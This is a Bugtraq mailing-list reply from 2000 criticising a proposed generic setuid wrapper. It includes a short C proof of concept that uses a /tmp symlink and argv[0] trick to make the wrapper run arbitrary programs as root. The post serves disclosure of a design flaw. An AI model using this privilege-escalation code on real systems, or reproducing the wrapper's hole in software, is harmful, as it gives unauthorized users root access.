Bugtraq
mailing list archives
Re: Format String Attacks
From: Pavel Kankovsky <peak () ARGO TROJA MFF CUNI CZ>
Date: Wed, 13 Sep 2000 23:36:40 +0200
On Wed, 13 Sep 2000, Doug Hughes wrote:
> Since I don't recall anybody else posting one, here is a simple, generic,
> setuid wrapper that people could use around, for instance, /usr/bin/eject
> or other setuid programs.
<ironic>
Thank you for a nice implementation of sudo that does not bother asking
for a password. Instant root for any user...very nice. But wait! It is not
complete. Here is the missing piece:
#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/param.h>
#include <limits.h>

int
main(int argc, char **argv, char **envp)
{
    char oldpath[MAXPATHLEN];
    char newpath[sizeof("/tmp/.orig") + (CHAR_BIT*sizeof(long)/3+1)];

    ++argv;
    srandom(getpid() + 5*time(NULL));
    if (argc < 2)
        { fprintf(stderr, "missing argument\n"); return 1; }
    /* resolve the program named on the command line */
    if (realpath(argv[0], oldpath) == NULL)
        { fprintf(stderr, "realpath failed\n"); return 1; }
    /* link it under a random name in /tmp that ends in ".orig" */
    sprintf(newpath, "/tmp/%ld.orig", random());
    if (symlink(oldpath, newpath) == -1)
        { perror("symlink"); return 1; }
    /* cut the ".orig" suffix off again and pass the result as argv[0] */
    strrchr(newpath, '.')[0] = '\0';
    argv[0] = newpath;
    execve("path-to-your-wrapper", argv, envp);
    perror("execve"); return 1;
}
</ironic>
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."